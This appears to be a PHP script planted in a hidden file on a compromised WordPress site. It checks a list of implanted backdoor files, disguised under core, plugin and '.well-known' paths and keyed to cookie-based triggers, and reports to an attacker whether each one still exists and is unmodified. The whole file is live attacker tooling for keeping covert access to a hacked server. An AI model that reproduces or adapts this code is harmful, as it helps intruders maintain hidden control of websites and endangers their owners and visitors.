File: /home/tomdaddy/public_html/site16.tomdaddy.com/wp-includes/.created
<?php $r = '/home/tomdaddy/public_html/site16.tomdaddy.com'; $x = ["/index.php"=>"bd@@339454@@45",
"/wp-admin/post.php"=>"bd@@346146@@data_storage",
"/wp-includes/media.php"=>"bd@@337988@@_COOKIE[3]",
"/wp-content/plugins/ftech-plugin/lib/codestar-framework/index.php"=>"bd@@341833@@_COOKIE[3]",
"/wp-content/plugins/envato-market/inc/admin/view/partials/plugins.php"=>"bd@@347569@@36",
"/wp-admin/async-upload.php"=>"bd@@344758@@$_COOKIE[3",
"/wp-admin/customize.php"=>"bd@@347585@@11",
"/wp-admin/setup-config.php"=>"bd@@344780@@70",
"/.well-known/acme-challenge/banner_yearly.php"=>"bd@@339923@@2573",
"/wp-content/plugins/elementor/modules/element-manager/admin.php"=>"bd@@347605@@2281",
"/wp-admin/user/profile.php"=>"bd@@339697@@$_COOKIE[4",
"/wp-content/plugins/elementor/vendor_prefixed/twig/twig/twig/src/Node/Expression/Binary/PEARSax3.php"=>"ui@@9218@@6920",
"/wp-includes/post-formats.php"=>"ui@@9218@@PEARSax3.php"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');